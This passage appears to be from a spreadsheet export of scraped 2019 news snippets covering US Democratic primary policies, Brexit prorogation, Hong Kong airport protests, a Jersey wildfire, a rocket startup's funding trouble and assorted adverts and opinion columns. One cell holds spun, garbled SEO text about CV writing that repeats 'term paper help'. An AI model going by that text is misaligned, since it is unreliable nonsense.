a gun violence forum and elsewhere — keeping tabs on the 20 Democrats who had come to do some retail politicking in the key early voting state. Here’s a roundup of some of what they reported: At a forum in Des Moines, the candidates voiced support for a common set of gun control proposals, like requiring universal background checks and banning military-style semiautomatic rifles. At the state fair, Senator Bernie Sanders of Vermont “examined the butter cow” and “gobbled a corn dog” but, as my colleague Sydney Ember put it, “spoke to almost no one” as he walked around. (Like others, he did draw a large crowd for his political speech.) Mr. Sanders’s approach underscored how he has grounded his campaign in championing ideas rather than establishing human connections. In our politics newsletter, Lisa Lerer provided some takeaways from her four days at the fair. Among them: The race has firmly separated into tiers, and Senator Elizabeth Warren of Massachusetts is having a moment. So who “won” the Iowa State Fair? We rated the candidates by corn dogs. If that seems confusing, just trust me: This is the best thing you’ll read today. A new proposal to tax the rich A Democratic candidate heartily endorsed new taxes on the wealthiest Americans this week. And no, it was not Ms. Warren or Mr. Sanders. The former housing secretary Julián Castro rolled out his expansive “People First Economic Plan for Working Families” on Thursday, a suite of new proposals aimed at providing relief to working families. A pair of new wealth taxes would help fund the commitments and are central to the plan. The first, an “inherited wealth tax,” would replace the estate and gift taxes with a federal tax on inherited incomes of more than $2 million. Mr. Castro’s team said such a tax would raise more than $250 billion over 10 years. The second tax, a “wealth inequality tax,” would apply to the top tenth of the top 1 percent of earners. Under the tax, capital income would be treated the same as labor income. Mr. Castro also promised to repeal the tax cuts passed under the Trump administration, to more than double the child tax credit to $3,000 and to increase the earned-income tax credit. Among the other Democrats calling for new taxes on the richest Americans, Ms. Warren has proposed a wealth tax that would target the 75,000 wealthiest families in the United States and levy an additional surtax on billionaires. Mr. Sanders has introduced legislation that would increase the number of wealthy Americans subject to the estate tax. In other policy news: Ms. Warren released her plan on curbing gun violence. She said she would use the president’s executive powers to require background checks and close loopholes. She also promised to send Congress legislation that would create a federal gun licensing system, ban assault weapons and increase taxes on gun manufacturers, among other measures. Ms. Warren also put forth a policy agenda aimed at supporting Native American communities, ahead of a scheduled appearance on Monday at a presidential forum on Native American issues. As we noted in our article on the proposals, her campaign has been dogged by the controversy over her claims of Native American ancestry. Senator Kamala Harris of California said that if elected, she would take executive action to require major online gun sales platforms to perform background checks. She also pledged to create a “Domestic Terrorism Prevention Order,” which would allow law enforcement officials to petition a federal court to temporarily seize the gun of a suspected terrorist. Mayor Pete Buttigieg of South Bend, Ind. released a plan for rural America in which he promised to fund “innovation clusters,” apprenticeship programs and a public-private partnership that would help train manufacturing entrepreneurs. The plan also calls for an “internet for all” initiative, higher salaries for teachers at rural schools and a “rural opportunity center” that would streamline the grant process in rural communities. The entrepreneur Andrew Yang unveiled a plan aimed at “restoring democracy.” He said he would eliminate super PACs and provide every American voter with $100 in “Democracy Dollars” that could be used to support any candidate. He also argued for ranked-choice voting, an end to partisan gerrymandering, term limits and other measures. Source link</t>
  </si>
  <si>
    <t>Europe saw around 90,000 cases of measles in the first half of 2019, more than in the whole of 2018 (84,462), according to the World Health Organisation (WHO). Read more? Click here</t>
  </si>
  <si>
    <t>Sparkle with this Solitaire Tri Set With Crystals From Swarovski Includes a pendant, a pair of earrings and a bracelet The pendant is secured with six rhodium plated claws The earrings comprise one crystal solitaire in an elegant yet secure setting Also included is a gorgeous single row tennis bracelet Stun in this classic solitaire set Comes fully boxed – ideal as a gift. Save 86% on the Solitaire Tri Set With Crystals From Swarovski Jewellery Normal Price: £ 49.00 Offer Price: GBP6.99 The post Solitaire Tri Set With Crystals From Swarovski appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Shannon Hampton</t>
  </si>
  <si>
    <t>A man has been rushed to hospital after he was hit by a car while crossing a road in his wheelchair tonight.</t>
  </si>
  <si>
    <t>Air travelers flying to and from Hong Kong may get some relief from flight cancelations and delays caused by protests there that led to the airport’s closure Monday. Hong Kong airport officials will restart flights at 6 a.m. Tuesday after operations were shut down Monday when thousands of pro-democracy demonstrators occupied the main terminal. All flights Monday that had not completed check-in procedures by afternoon were canceled, as were arriving flights that had not yet taken off. That includes United Airlines flights that connect Hong Kong to Newark Airport and JFK. Two flights between Hong Kong and Guam were canceled Monday, said Kimberly Gibbs, a United spokeswoman. Two other flights from Chicago to Hong Kong and New York to Hong Kong were expected to arrive as scheduled, she said. A San Francisco flight landed in Hong Kong earlier Monday with no issues, Gibbs said. “Our team is making arrangements for our customers to complete their journeys,” Gibbs said. “United Airlines will closely monitor the situation and provide flight status updates to our customers.” Hong Kong has experienced more than two months of mass protests calling for democratic reforms and an independent inquiry into police conduct in the wake of proposed legislation that would have sent people accused of a crime to mainland China for trial. That bill was withdrawn. The Associated Press contributed to this article. Larry Higgs may be reached at lhiggs@njadvancemedia.com. Follow him on Twitter @commutinglarry. Find NJ.com on Facebook. Have a tip? Tell us. nj.com/tips. Get the latest updates right in your inbox. Subscribe to NJ.com’s newsletters.</t>
  </si>
  <si>
    <t>Liverpool vs Arsenal Original Source Charlie Nicholas' Premier League predictions: Will Arsenal beat Liverpool? Four games live on Sky Sports: Aston Villa vs Everton (Friday, 8pm),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Liverpool vs Arsenal appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Boris Johnson ‘anxious’ Parliament will ‘undermine’ UK’s ability to gain a Brexit deal Original Source Boris Johnson has said he is anxious MPs in Parliament may “undermine” the UK’s ability to strike a Brexit deal with the EU, claiming there is now “movement” in his negotiations. He told ITV News Political Correspondent Libby Wiener: “My anxiety is that stuff going on in Parliament can actually undermine the UK’s negotiating position.” “There is movement under the keel,” he said, adding: “It’s therefore vital that our EU friends don’t constantly think at the back of their minds, hmm, this thing could be blocked in Parliament, Brexit could be thwarted.” The prime minister called for both the UK and EU to intensify efforts as further protests were planned over his move to prorogue Parliament for more than a month in the run-up to Brexit. Prime Minister Boris Johnson said: “What I want to do now, which is I think what most people in this country want the Government to do, is get on and try and get an agreement but, if we can’t get an agreement, get ready to come out anyway. “It’s by getting ready to come out anyway that we have greatly strengthened our position with our friends and partners in the EU, because they see that we are serious.” His comments come as Opposition MPs plan how they can block a no deal Brexit and courts prepare to hear cases aimed at stopping the suspension of Parliament. Cases are due to be heard in London, Belfast and Edinburgh following outrage at what is being labelled an anti-democratic prorogation of Parliament. The High Court in London will hear a case on Thursday brought by campaigner Gina Miller and backed by Labour deputy leader Tom Watson and former Conservative prime minister John Major. Mr Watson said: “Proroguing Parliament is an unprecedented affront to democracy. “The rights and freedoms of our citizens have been vandalised. This is an abuse of power that can and should be stopped.” He added: “I will be joining the judicial review launched in the High Court by Gina Miller and supported by John Major as a claimant.” Mr Major said on Friday he would “seek the Court’s permission to intervene in the claim already initiated by Gina Miller, rather than to commence separate proceedings”. In Scotland claimants were denied an interim block of the suspension of Parliament at the Court of Session in Edinburgh. A cross-party group of MPs and peers filed a petition at Scotland’s highest civil court earlier this summer aiming to stop the Prime Minister being able to prorogue Parliament. They called for an interim interdict on Thursday to halt prorogation until a final decision has been made on the case. On Friday, Judge Lord Doherty dismissed the action ahead of a full hearing set for Tuesday, September 3. He said: “I’m not satisfied that it has been demonstrated that there’s a need for an interim suspension or an interim interdict to be granted at this stage.” PM enthusiastic in his interview with me today about the chances of clinching a deal with the EU after meetings with Merkel and Macron last week. But if it all goes wrong, his message: blame Parliament, not me. @itvnews #Brexit— Libby Wiener (@LibbyWienerITV) August 30, 2019 " data-on-all-screens="true"&gt; Sorry, this content isn’t available on your device. He said he was moving the full hearing from its original September 6 date to Tuesday, adding: “It’s in the interest of justice that it proceeds sooner rather than later.” The PM said his decision to request that the Queen suspend Parliament was to allow the government to press on with domestic policy aside from Brexit. “I said on the steps of Downing Street, I said we weren’t going to wait until October 31, I said we will not wait before getting on with the priorities of the people of this country,” he said. He claimed MPs opposed to no-deal Brexit will have “ample opportunity between now and the 31st” to express their views. Protest organisers are hoping “hundreds of thousands” of people will take part in disruption across Britain this weekend in response to the Prime Minister’s plan to prorogue Parliament. Labour leader Jeremy Corbyn encouraged his MPs to join the public protests. He said: “There are also public protests across the country this Saturday, there will be a rally in Parliament Square on Tuesday evening, and I encourage Labour MPs to be present and to share our message.” Anti-Brexit campaign group Another Europe Is Possible has organised 32 #StopTheCoup demonstrations to take place in England, Scotland and Wales on Saturday. Meanwhile, left-wing group Momentum is calling on its members to “occupy bridges and blockade roads” in conjunction with the protests. Michael Chessum, national organiser for Another Europe Is Possible, told the PA news agency that “disruption is the only form of leverage protesters can rely on”.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Boris Johnson ‘anxious’ Parliament will ‘undermine’ UK’s ability to gain a Brexit deal appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Retailer’s glitter ban comes amid concern about microplastics polluting the environmentMarks &amp; Spencer has joined the effort against microplastics by banning glitter from this year’s Christmas cards, wrapping paper, calendars and crackers.The retailer, which last year tested a biodegradable alternative to glitter on its fresh flowers and plants, said it is aiming to be 100% glitter-free by the end of next year. Continue reading… Read More</t>
  </si>
  <si>
    <t>When trying to shape up, a structured diet plan can help slimmers stay motivated and reach their goals. Some people who have been through a big weight loss transformation will use social media to give tips on what they did to slim. Posting on Reddit, the dieter “secretiveBirdgirl” explained she followed a keto plan and exercised more to transform her body. By switching up her diet, she slimmed down from 15st 5lb to a much healthier 11st 1lb. By eating between 20 to 50 grams of net carbs a day, the body will enter into a state called ketosis which is thought to burn more fat. Foods on the keto diet include meats, fish, eggs, avocados, dairy, non-starchy vegetables and low-carb fruits. Slimmers must avoid high-carb foods like bread, rice, potatoes, pasta and sugary fruits. “secretiveBirdgirl” explained she also added more exercise into her life when slimming down and focused on cardio. After posting her transformation online, other Reddit users were quick to comment on her jaw-dropping transformation. One user wrote: “This is the motivation I need! Same height and approx goals. You look great and serious face gains! Congrats on the hard work to get there!” “Congrats on the progress! Glad you found things that brought you closer to your goals. You look great,” another added. Dieters will often take to social media to show off their transformations and one man explained what he did to shape up. Following a keto diet plan, he managed to slim down by a staggering 10st 13lb. By strictly following the plan he managed to shed the weight without having to add in a lot of exercise. Source link</t>
  </si>
  <si>
    <t>A new book spells out just how Treasury’s relationship with the elected government has "changed dramatically in recent times".</t>
  </si>
  <si>
    <t>Menopausal women should be protected from workplace discrimination say MPs Original Source Menopausal women should be protected from workplace discrimination just as pregnant woman are, say MPs Women battle anxiety, depression, hot flushes and muddled thinking at work Sky newsreader Kay Burley, 58, and BBC presenter Louise Minchin, 50, have spoken out on how the menopause has affected their work Women across the country have lost jobs or go part-time due to symptoms By Victoria Allen Science Correspondent For The Daily Mail Published: 01:56 BST, 26 August 2019 | Updated: 01:57 BST, 26 August 2019 Employers should protect women going through the menopause just like those who are pregnant, according to MPs. A ‘menopause policy’ should be standard in the workplace, they say, as women battle anxiety, depression, hot flushes and muddled thinking. A record number of women over 50 are in work, with 4.9 million employed, which is double the number of female over-50s working 25 years ago. Celebrities including Sky newsreader Kay Burley, 58, and BBC presenter Louise Minchin, 50, have spoken out on how the menopause has affected their work. Labour MP Carolyn Harris (pictured) said their should be legislation in the workplace Women across the country have lost jobs, been forced to take time off or raid their savings and go part-time because of the symptoms. Labour MP Carolyn Harris is reported in the Guardian as saying: ‘You wouldn’t dream of having a workplace where people weren’t entitled to certain things because they were pregnant, and it’s exactly the same for women with the menopause. ‘I firmly believe there should be legislation to make sure every workplace has a menopause policy, just like they have a maternity policy.’ Conservative MP Rachel Maclean, one of the first to speak about the menopause in the House of Commons, said: ‘I absolutely agree that employers need to do more. ‘It’s not well understood. Employees don’t get the support they need, it is very difficult for women at work often.’ She added: ‘My central message is, menopause is the last taboo because it is still hidden and it only affects women and it only affects older women. It’s ageism, it’s sexism, all rolled into one.’ Research has found many women are afraid to admit they are suffering problems from the menopause for fear of losing their jobs. The symptoms come when women stop ovulating and their hormone levels drop, with many ending up on anti-depressants. Sky newsreader Kay Burley, 58, has spoken out on how the menopause has affected her work A survey by online platform Health &amp; Her earlier this month found a quarter of working women over 50 find their menopause symptoms so debilitating they would like to cut their hours at work. Miss Harris told the Guardian she had gone to see a GP in 2010 following treatment for a gynaecological condition, adding: ‘I was having a nervous breakdown. I was really depressed and had mental health issues. ‘I think that’s down to the fact I was going through the menopause. ‘So many women end up on antidepressants or being told to pull themselves together.’ Sue Hackett, the London regional equality officer at the GMB union, said: ‘It is high time we stop treating menstruation and menopause as taboo subjects. ‘Women have put up with insulting comments and a woeful lack of provision for far too long for what is a completely natural condition.’ Share or comment on this article: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Menopausal women should be protected from workplace discrimination say MPs appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Kieran Tierney has been posing in his new kit after completing a £25m move to Arsenal from Celtic this afternoon. See photos here</t>
  </si>
  <si>
    <t>Jamie McKinnell</t>
  </si>
  <si>
    <t>Lawyers for the ABC argue the terms of a warrant used to raid the broadcaster's Sydney headquarters went well beyond the purpose of seeking to confirm admissions contained in stories known as the Afghan Files.</t>
  </si>
  <si>
    <t>The online retail giant is reverting to "dark art PR", with a phalanx of employeers tweeting about how great it is to work at Amazon.</t>
  </si>
  <si>
    <t>American artist Diana Waymar wanted to find a way of relating to the current political atmosphere. So she began knitting Mr Trump’s words. The post Why this woman decided to knit Trump’s tweets appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Arsenal take on Tottenham at the Emirates on Sunday afternoon. Here is the side Gooner Mac thinks Unai Emery will select for the game:</t>
  </si>
  <si>
    <t>A parade of teammates found the prop hard to live with. But then he found his ideal roommate.</t>
  </si>
  <si>
    <t>DJI definitely seems to be keeping busy – less than a month ago the Chinese manufacturer debuted the lightweight Ronin-SC gimbal for mirrorless cameras, which was followed closely by the release of its new FPV Goggles. According to a 15-second video posted on its official YouTube channel, DJI is gearing up to announce something new on August 13. The teaser itself doesn’t seem to hold any clues as to what might be making its debut next week, but based on some other evidence, it could well be the next generation Osmo Mobile smartphone gimbal. DroneDJ was the first to unearth details about the … TechRadar – All the latest technology news The post New DJI product launch teased for August 13 appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Album Goa-Trance &amp; Nitzhogoa https://beatspacesita.bandcamp.com/album/zopmanika-mysteryland-sitarcd012 Track-List: 1-Liquid Dreams (9:05) 2-Ice Queen (7:09) 3-Crystalinks (11:16) 4-Annular Eclipse (8:47) 5-Mystery Land (7:39) 6-Trip To Nowhere (8:44) 7-As Far As The End Of The Sky (With Agneton) (7:18) 8-Look Into Yourself (9:21) 9-Lost Touch With Reality (8:02) (Info/Note Artist) Zopmanika is a Nitzhogoa Project From Macedonia by Bojan […] The post Zopmanika – Mysteryland (Full Album) appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Hugh Mackenzie Huntsville Doppler Fun, in Politics? With the federal election in this country just a few months away, it will be interesting to watch the dynamics of the various political parties as they fight for their positions on the national stage. It will be different this time, in part because of the presence of the so called People’s Party of Canada. I for one am not sorry to see Maxime Bernier and his newfound political party as part of this election cycle. It gives us an opportunity to put all the nuts in one basket, where we can clearly see them and know who they are. To be clear, this is not a conservative party, but it is the reason Maxime Bernier could not find a home there. His new political movement is an alt-right party, leapfrogging on disturbing trends seen in the United States and other parts of the world. In my view, it could be a comfortable home for white supremacists, homophobes, neo-nazis and racists. I would like to think that we have none of these in Canada, but sadly we do, and the People’s Party is welcome to them. Bernier’s new movement is yet another sign of political polarization in Canada. Gone are the days when political parties could vigorously debate important national and provincial issues, often finding a middle ground, without demeaning their opponents, almost to the point of metaphorically questioning their parentage. Fierce debate and yet respect across party lines was a genuine commodity in those days. Today, it is a “my way or the highway” approach to politics. You are either with me or you are against me and if you are against me, you must be the enemy. If you are the enemy, I am not even going to talk to you. This type of atmosphere in the political realm must be very hard on many if not most elected people. I do believe that the majority of individuals who seek elected office do it for the right reasons: to serve the people they represent, to make our country more prosperous, and to have a platform to express their views. There must be a high level of frustration when they find so often that their hands are tied, when they are told what to say, when they are forbidden to challenge the boys in short pants from the PMO and when they are discouraged to fraternize with those who hold different opinions. In that regard, I think of people like Jane Philpott and Jody Wilson-Raybould, both first-rate parliamentarians. More top of mind, however, I think of two people who have recently and tragically died, both at too young of an age, who in my view must have been very disturbed by the polarization and nastiness of politics today. The first is David Caplan who died suddenly a week or so ago at the age of 54. He was a Liberal and former Minister of Health. He was a fierce partisan. His friends called him the Happy Warrior. But he knew how to work with people. He listened to their ideas and he was never afraid to cross the aisle to work with people whose opinions were different than his. Most importantly, he treated everyone with respect, a quality sadly missing in politics today. I worked with David Caplan on a number of occasions, from the time he was a young school trustee. Among the many people I worked with over the years, he is one of those that stands out. He was that kind of guy. Another shocker came yesterday, when it was learned that Deepak Obhrai had died from a fast acting liver cancer at the age of 69. Now most people, even some of the initiated, will have no idea who he was, but in my view he was one of the best parliamentarians we have. He has served as a member from Calgary for 22 years, having been elected five times. He was Dean of the Conservative Caucus. He ran for the Leadership of the Party when he knew he didn’t have a snowballs chance in Hell of winning, because he had things he believed it was important to say. He was outspoken, he was funny, he was innovative, and he was loved by people on both sides of the aisle in Parliament. Both of these men exuded warmth, wisdom kindness, and good humour. How little of that we see in politics today. And now, we are entering into an election period where the reality is that few of these important qualities, so necessary in a positive and open democracy, will be evident. It is going to be a mud slinger. The party leaders are already at it, using wedge issues such as homophobia and abortion to smear each others’ character when they should be concentrating on issues such as the economy, climate change, healing a divided nation and ensuring that no one, as they now must do in Quebec, needs to choose between their faith and their career. It is my view that people’s sexual orientation and issues related to a woman’s body have no place in politics. They are personal and they are private, and they don’t need a bunch of politicians judging them or telling them what to do. Pierre Elliott Trudeau said it best when he said there is no place for the state in the bedrooms of the Nation. Wedge issues are simply intended to distract from issues that really are the business of the nation. Justin Trudeau is reported to have told a group of students at McMaster University that political involvement included pizza, sex and all sorts of fun things. He may be right about the sex, but if you think there is still fun in politics just watch this next election campaign. Don’t miss out on Doppler! Sign up for our free newsletter here. Like The post Listen Up! If you think there is still fun in politics, just watch this next election campaign appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>Rose McGowan is my spirit animal. I knew I wore my hair like Rose and Judi Dench for a reason. Sisters!</t>
  </si>
  <si>
    <t>Bachar Houli opens up about his trip to Christchurch after the shooting, and how his faith propels him forward in life.</t>
  </si>
  <si>
    <t>STEPHEN SCOURFIELD’s guide to Bordeaux</t>
  </si>
  <si>
    <t>What the In-Crowd Won’t Tell You About Cv Writing Service The Importance of Double-majoring at Healthcare While curious in from the healthcare field could be utterly the most profitable, it may also function as absolutely the absolute most pricey based on askmen.com. Double-majoring in both industry direction and diet will be able to assist you to are given a job to get a management dietitian. A prosperous director is additionally a amazing leader who makes a work climate which promotes productiveness. Neglect of a corporation will also be its own downfall. Recognize just how your job becomes part of their organization’s mission. term paper help On the reverse side, staff members are given appropriate education in order that they are able to increase their capabilities and benefit the increase of the company. The previous one ought to become applied from the scenarios once you basically can’t enable an client, while it truly is as you don’t comprehend how or you are not authorized to execute it. In the event that you can’t locate the opportunity to execute the task, then it’ll be considerate of you to allow them understand whenever potential so they could make alternative arrangements. Just take the possibility to find customer requirements by asking questions and focusing on exactly what exactly the customer is truly saying. It is additionally not unusual a well-thought-out post card boosting effort may bring about a substantial increase in earnings term paper help and revenues. Make an effort to respond to a customers once you’re able to. Attempt and recall, expert CVs are times longer inclined to be more considered over by employers. The Best Way to Get the Best Out of Your Small Business Besides quantifying customer satisfaction, calculating attrition speed may likewise be utilised as a measure to find out if employees really are pleased. Additionally, it truly is a strategy that also is able to lower earnings and also boost employee retention. A superb sales demonstration starts with a fast review of their clients’ aims and objectives. Effective sales people comprehend that price is now a element in most selling but it’s infrequently the principal reason somebody selects a certain merchandise or supplier. In printing press, regardless of what the complete flow, clients need to discover the webpage your advert is located, and also spend the actions specified in your own ad. Many lawn care companies possess a minimum of one commercialgrade riding lawn mower, a considerable investment. The Way to Get the Optimal/optimally Business Blog Most folks invest a appreciable part of these internet time seeing movies. TradeKing gets a good deal of excitement and ink from the blogging group too, with several commentary and reviews to the corporation’s progress. term paper help Regardless of what type of enterprise you’ve got, you will profit if persons are able to get your company on Google. You’re obviously informed that generating the suitable image using a CV needs a lot of energy and time. Additionally you will see that our list isn’t very long. Figure out how videos might be a reasonable and successful way to promote your organization. Nobody likes to track down unwanted reviews about their organization about face-book or client inspection sites, but if you don’t ideal, it’ll likely materialize. The web is no longer simply a place of articles. An forum is generally tracked by means of the moderator who has got the capability to edit forum articles. Additional that you provide or products and services you imagine ought to be comprised. Though it might seem that the customer will not worry about everything you have got to say at the beginning, bear in the mind that the consumer approached one for settlement. If your customer thinks a corporation may be depended on incase of a issue, he’ll become more prone to get services or goods out of that business later on. Your company website ought to simply help you participate along with your clients, this means you desire to become really careful never to violate them. Customer surveys can allow a business better comprehend its own consumer base and set an optimistic relationship involving clients and client service representatives. Emailmarketing is a powerful and reasonably priced method of stay in contact with your own customers. To prevent these tolling bells, it will be likely to no longer compete term paper help strictly on selling price of products alone. Whether you’re purchasing gear for your house or undergoing therapy at a hospital, you wish to comprehend what other similar goods are about the business. Once you have products which could be sold online, or you’re able to take orders on line, that’s an extra advantage.</t>
  </si>
  <si>
    <t>White House officials pushed back on Sunday against concerns that economic growth may be faltering, saying they saw little risk of recession despite a volatile week on global bond markets, and insisting their trade war with China was doing no damage to the United States. Grace Lee reports.</t>
  </si>
  <si>
    <t>Simon Rushton</t>
  </si>
  <si>
    <t>Celebrating students setting fire to their school uniforms sparked a wildfire on the island of Jersey. Children marking their last day of school set their uniforms on fire on a dry field in the Channel Island Huge plumes of smoke could be seen across Jersey but the cause of the fire had remained a mystery. As the fire started, the island had seen almost a month of temperatures in the 20s celsius and very little rain. Restorative justice possible The fire involved 2,500 square meters of furze (Photo: Jersey Fire and Rescue) Jersey Fire and Rescue Service carried out an investigation into the wildfire, started on 16 July, and found students to be the cause. A restorative-justice plan – which could involve those responsible for the blaze helping in the area – was being considered. But the fire service said no official action was being taken. The fire service said pupils were celebrating the end of term by burning uniforms and the blaze caught hold and spread, eventually covering an area of about 2,500m sq, about a third the size of a football pitch. A fire service spokeswoman said the cause was accidental and no further action would be taken. ‘Words of advice’ The young people involved, and their parents, were spoken to following the incident and were dealt with “appropriately, with suitable words of advice”, the spokesperson added. Fire crews were called to scene, near Mont Huelin, at about 9.15pm. No homes were damaged. Both duty and on-call firefighters were on the scene for over two hours tackling the flames and damping down the area to ensure it was safe. More fire Gran Canaria fire: latest wildfire updates Guests evacuated as Holiday Inn hotel in Walsall engulfed by flames 125 firefighters called to massive blaze at London shopping centre Kyoto Animation fire: suspected arson attack leaves 23 feared dead Kentucky River filled with bourbon after fire destroys 45,000 barrels Ilkley Moor arsonist told to expect a 'substantial' jail sentence The post Wildfire in Jersey was sparked by students burning their school uniforms appeared first on inews.co.uk. The post Wildfire in Jersey was sparked by students burning their school uniforms appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>The best of the week's comedy on TV and radio</t>
  </si>
  <si>
    <t>By Stan Scott, Democratic nominee for State Senate in Virginia’s 4th District. You can find him on Facebook, Instagram, and Twitter. Learn more at www.stanforvirginia.org. Two domestic terrorists, at least one a white supremacist, murdered 29 people – and left dozens more in critical condition – in less than 24 hours this weekend. It’s never been more obvious that we have a hate problem and a gun problem in America today. We of course support victims and their families as they grieve and praise the first responders who put their lives at risk to save innocent lives. But thoughts and prayers bring no change. It’s time to act. If you’re not part of the solution, you’re part of the problem. Donald Trump and Sen. Ryan McDougle (R-SD4) are part of the problem. My opponent won’t condemn Donald Trump’s racist rhetoric or the white supremacism he saw right here when the KKK rallied in front of the Hanover County Courthouse in July. And he welcomed NRA members to the Senate gallery just before voting to adjourn the Special Session called to address gun violence after Virginia Beach. Ryan McDougle won’t stand up to Trump or the NRA, but I will. That’s why I’m running to fight for you in the State Senate. The hate problem is nothing new. Americans have faced discrimination because of skin color, gender, sexuality, religion, country of origin, and cultural differences since the Founding. We managed to expand civil rights protections since the 1950s, largely by shaming open bigotry and condemning people who voice the hatred they feel. Donald Trump has actively sought to make hatred and bigotry acceptable again. He failed to condemn self-described Nazis screaming “Jews will not replace us!” as they marched. He tweets racist attacks on immigrants and people of color, including sitting Congresswomen and the parents of war heroes. His rhetoric has made white supremacists bolder, and with predictable results: a domestic terrorist attack targeting people of color by a young man who expected to be part of a race war. Americans have also always been well-armed. I grew up around rifles and learned to shoot before I entered my teens. Many of my schoolmates hunted and sometimes brought shotguns to school after an early-morning deer hunt. But until the NRA became the lobbying arm of the gun manufacturers few people understood guns as necessary for individual self-defense during trips to the grocery store. Fewer still stockpiled high-powered weapons and ammunition as a hedge against government tyranny. Today almost anyone can collect an arsenal of firearms and accessories far beyond what they need for individual self-defense. Semi-automatic rifles designed to fire military-grade ammunition make no sense of any kind for this purpose. And let’s face it: the days of citizen militias protecting liberty against a standing army are long past us. These weapons make sense only for use in terrorist attacks by the radicalized or disaffected. I’m running for the State Senate to be part of the solution. I condemned the KKK and white supremacy openly and in public. Nothing but crickets from Senator McDougle. I’ve called for real change in gun policy. McDougle lacked the moral courage to stand up for his pro-gun beliefs on the Senate floor. Please support my campaign by donating, volunteering, joining us on social media, and telling all your friends that this year voters have a chance to elect a Senator who wants to be part of the solution. And please remind them that McDougle doesn’t.</t>
  </si>
  <si>
    <t>One Telus customer said: "without email, businesses are shutting down."</t>
  </si>
  <si>
    <t>Jane Merrick</t>
  </si>
  <si>
    <t>Harriet Harman and Ken Clarke had both long harboured ambitions to be Prime Minister, and yet, for these two veterans of British politics, those ambitions had, until this summer, looked set to be unrealised. Yet the Mother and Father of the House have suddenly become principal candidates to lead a caretaker administration if Boris Johnson loses a confidence vote in a little over two weeks’ time. While the two were – separately – on holiday this summer, new Liberal Democrat leader Jo Swinson was contacting them to see if they would be open to heading up a government of national unity as a way of stopping a no-deal Brexit. As with the appeal by Jeremy Corbyn for cross-party support for his bid to lead an interim government, the Swinson plan has been ridiculed by Conservative ministers and others in Westminster. And yet the positive response by Mr Clarke and Ms Harman – and that of hardened Tory rebels – will be causing alarm in Downing Street. The Labour leader’s letter to fellow leaders and senior rebel Tories, and the fact that, save for Ms Swinson, it has not been rejected out of hand, is significant because it sketches, albeit roughly, a road map to stopping both Mr Johnson and a no-deal Brexit in their tracks. Majority of one Could Harriet Harman unite a coalition (Photo: Dan Kitwood/Getty Images) The Prime Minister, in his first three weeks in Downing Street, has behaved like he has a majority of 101 rather than one, supported by the DUP. He has appointed an all-powerful adviser in Dominic Cummings, and treated European leaders, with whom he says he wants to strike a deal, with lofty disdain. Just as his victory in the Conservative leadership contest had carried a relentless inevitability, so too had a no-deal Brexit carried over the finishing line by Mr Johnson. Until this week. Mr Corbyn remains a divisive figure in Westminster among even his own backbenchers. And yet what those who have engaged with his letter can see is an alternative to no-deal Brexit. Just because there is disagreement among the opposition and rebel Tories about the means to get there – and who will lead the way – they do all agree on the ends: a government of national unity headed by someone who isn’t Mr Johnson. For them, engaging with Mr Corbyn is a staging post to get to a unity government, not necessarily the end product. Since the 2016 referendum result, so much has been said for Brexit realigning party politics. We have had the breakaway Change UK and independents since February, and, in the Commons, MPs voting along Brexit, rather than tribal party, lines. Yet this bid for a government of national unity, in whatever form it takes, is the first time MPs are putting an issue over party unity in order to change government itself. It is a framework for a genuine and lasting realignment of British politics. There is alarm in Downing Street because the opposition and rebels are getting organised, and, for the first time, everything is in play. More Brexit Unity fails to find leader for a National Unity Government Scottish drinks recycling scheme may be derailed by Brexit Could Corbyn become PM without a general election? What is a government of national unity and how would it work? Swinson says Corbyn's no-deal Brexit plan has 'no chance of success' Nicola Sturgeon: I’d back Corbyn to stop no deal but I don’t trust him The post Analysis: Alarm in Downing Street as all sides for no-deal Brexit begin organising appeared first on inews.co.uk. The post Analysis: Alarm in Downing Street as all sides for no-deal Brexit begin organising appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/08/11/vectors-launch-business-in-peril-after-major-change-in-financing/ Vector’s launch business in peril after ‘major change in financing’ Small satellite launch startup Vector has indefinitely shut down operations “in response a major change in financing,” the company confirmed. Co-founder and CEO Jim Cantrell has also been cut loose as part of the upset. The news comes as a surprise to the space startup community, and apparently to its employees. The company lined up $70 million in funding late last year, and recently was announced as a qualified contestant in DARPA’s Launch Challenge. It even pulled in a multi-million dollar Air Force contract just last week. That something must have gone awry with this latest funding is manifest. But just what, or who, is unclear. I’m contacting the venture firms in the round (Kodem, Morgan Stanley Alternative Investment Partners, Sequoia, Lightspeed and Shasta Ventures) and will update if anyone has any substantial comment. The company offered the following statement, as well as confirming that Cantrell is out. In response to a major change in financing, Vector has had to pause its operations. A core team is now evaluating options to complete the development of the company’s Vector R small launch vehicle while also supporting the Air Force and other government agencies on programs such as the recent ASLON-45 award. I’ve asked for more details on the size of this “core team” and how many employees Vector will have to lay off as part of this “pause” in operations. Vector speeds toward orbital launch capability with $70M in new funding Vector has been working on an orbital launch vehicle, the Vector-R, with a 60 kilogram maximum payload — a small rocket for small satellites, for which there is plenty of demand. A heavier version that could lift 290 kg was also under development. Plans were to demonstrate an orbital launch by the end of 2019, but as yet that has not occurred; a suborbital launch was also planned for sometime this summer, but that too is yet to happen. Perhaps the launch delays were the cause of the funding problems, or perhaps the funding problems led to launch delays. I’ll update this story as soon as more details are available. Source: https://techcrunch.com/2019/08/11/vectors-launch-business-in-peril-after-major-change-in-financing/ The post Vector’s launch business in peril after ‘major change in financing’ appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Monday Picks: Rachel Khoo's Kitchen Notebook: London, This Time Next Year, The Rookie</t>
  </si>
  <si>
    <t>Matthew Parris</t>
  </si>
  <si>
    <t>Look out. Here comes a column banging on about something that, in the grand scheme of things, really doesn’t matter.…</t>
  </si>
  <si>
    <t>Welcome to our live coverage of the third Ashes Test in Leeds.</t>
  </si>
  <si>
